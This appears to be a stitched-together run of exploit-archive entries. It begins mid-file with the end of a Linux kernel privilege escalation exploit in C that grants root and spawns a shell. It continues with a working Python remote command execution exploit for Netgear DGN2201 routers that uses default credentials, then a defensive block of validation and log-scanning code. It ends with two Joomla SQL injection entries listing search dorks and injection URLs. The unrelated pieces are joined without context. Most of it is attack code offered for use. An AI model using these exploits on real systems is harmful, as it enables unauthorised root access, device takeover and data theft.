    for (i = 0; i < CATCH_AGAIN; i++)
        udp_fifo_kmalloc(&uh3, &dummy[0]);

    printf("[.] done\n");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

void get_root_payload(void) {
    commit_creds(prepare_kernel_cred(0));
}

void get_root() {
    printf("[.] getting root\n");
    kernel_exec(&get_root_payload);
    printf("[.] should be root now\n");
}

// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *

void exec_shell() {
    char *shell = "/bin/bash";
    char *args[] = {shell, "-i", NULL};
    execve(shell, args, NULL);
}

void fork_shell() {
    pid_t rv;

    rv = fork();
    if (rv == -1) {
        perror("fork()");
        exit(EXIT_FAILURE);
    }

    if (rv == 0) {
        exec_shell();
    }
}

bool is_root() {
    // We can't simply check uid, since we're running inside a namespace
    // with uid set to 0. Try opening /etc/shadow instead.
    int fd = open("/etc/shadow", O_RDONLY);
    if (fd == -1)
        return false;
    close(fd);
    return true;
}

void check_root() {
    printf("[.] checking if we got root\n");

    if (!is_root()) {
        printf("[-] something went wrong =(\n");
        printf("[!] don't kill the exploit binary, the kernel will crash\n");
        return;
    }

    printf("[+] got r00t ^_^\n");
    printf("[!] don't kill the exploit binary, the kernel will crash\n");

    // Fork and exec instead of just doing the exec to avoid freeing
    // skbuffs and prevent crashes due to an allocator corruption.
    fork_shell();
}

static bool write_file(const char* file, const char* what, ...)
{
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    int len = strlen(buf);

    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;
    if (write(fd, buf, len) != len) {
        close(fd);
        return false;
    }
    close(fd);
    return true;
}

void setup_sandbox() {
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0) {
        perror("unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
        perror("unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    if (!write_file("/proc/self/setgroups", "deny")) {
        perror("write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
        perror("write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }

    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(0, &my_set);
    if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
        perror("sched_setaffinity()");
        exit(EXIT_FAILURE);
    }

    if (system("/sbin/ifconfig lo up") != 0) {
        perror("system(/sbin/ifconfig lo up)");
        exit(EXIT_FAILURE);
    }

    printf("[.] namespace sandbox setup successfully\n");
}

int main() {
    setup_sandbox();

#if SMEP_SMAP_BYPASS
    disable_smep_smap();
#endif

    get_root();

    check_root();

    while (true) {
        sleep(100);
    }

    return 0;
}

Netgear DGN2201 v1/v2/v3/v4 dnslookup.cgi Remote Command Execution

#!/usr/bin/python

#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)

#Greetings to Kornela, Komara and Sknerusa

import sys
import requests

#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to

login = 'admin'
password = 'password'

def main():
    if len(sys.argv) < 2:
        print "./netgearpwn_2.py"
        return
    spawnShell()

def execute(cmd): #Escaping basic sanitization
    requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name': "www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
    return

def spawnShell():
    print "Dropping a shell-like environment (blind OS injection)"
    print "To test it type 'reboot'"
    while True:
        cmd = raw_input("[blind $] ")
        execute(cmd)

if __name__ == "__main__":
    main()

#2017-02-25 by SivertPL
#Yes, it's me.
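The defender's counterpart to the injection above, as an added example that is not the exploit's or the router firmware's code: host_name is validated as a DNS name before use and handed to the resolver as a separate argv element rather than a shell string, and the same check is run over constructed request bodies to flag attempts. The use of nslookup, the function names and the log format are assumptions.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Added example (not the exploit's or the router's code): validation,
# safe invocation and detection for a dnslookup.cgi-style host_name parameter.
# The resolver name nslookup and the log/body format below are assumptions.

# One RFC 1123 label: 1-63 letters/digits/hyphens, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Characters that only make sense if the value is going to reach a shell.
_SHELL_META = set(";|&`$(){}<>\n\r '\"\\")


def is_valid_hostname(name):
    """Strict allowlist: the only thing a lookup endpoint should accept."""
    if not name or len(name) > 253:
        return False
    if name.endswith("."):
        name = name[:-1]
    return all(_LABEL.match(label) for label in name.split("."))


def looks_like_injection(name):
    """Detection helper for request logs: flags values carrying shell syntax."""
    return any(ch in _SHELL_META for ch in name)


def vulnerable_command_line(host_name):
    """Shape of the flaw the exploit abuses: parameter pasted into a shell line."""
    return "nslookup " + host_name


def safe_lookup_argv(host_name):
    """Rejects anything that is not a host name, then builds an argv list so the
    value is never parsed by a shell (and, lacking a leading '-', never by the
    resolver's option parser either)."""
    if not is_valid_hostname(host_name):
        raise ValueError("rejected host_name: %r" % host_name)
    return ["nslookup", host_name]


def rejects(host_name):
    """True when safe_lookup_argv() refuses the value."""
    try:
        safe_lookup_argv(host_name)
    except ValueError:
        return True
    return False


def run_lookup(host_name, timeout=5):
    """Runs the validated lookup without shell=True; returns stdout text."""
    argv = safe_lookup_argv(host_name)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout


def scan_requests(bodies):
    """Constructed log format: one URL-encoded POST body per line.
    Returns the decoded host_name values that should be alerted on."""
    hits = []
    for body in bodies:
        if "host_name=" not in body:
            continue
        raw = body.split("host_name=", 1)[1].split("&", 1)[0]
        value = unquote_plus(raw)
        if looks_like_injection(value) or not is_valid_hostname(value):
            hits.append(value)
    return hits


if __name__ == "__main__":
    # Constructed sample bodies: one benign lookup, one with the exploit's shape.
    sample = ["host_name=www.google.com&lookup=Lookup",
              "host_name=www.google.com%3B+reboot&lookup=Lookup"]
    print(scan_requests(sample))  # ['www.google.com; reboot']
```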

Joomla Gnosis 1.1.2 SQL Injection

# # # # # 
# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_gnosis
# Date: 25.02.2017
# Vendor Homepage: http://hypermodern.org/
# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
# Demo: http://gnosis.hypermodern.org/index.php/dictionary
# Version: 1.1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
# # # # #

Joomla My MSG 3.2.1 SQL Injection

# # # # # 
# Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection
# Google Dork: N/A
# Date: 25.02.2017
# Vendor Homepage: https://www.cmsplugin.com/
# Software : https://www.cmsplugin.com/products/components/10-my-msg
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg
# Version: 3.2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL]
# http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL]
# '+order+by+10-- -
# Etc...
# # # # #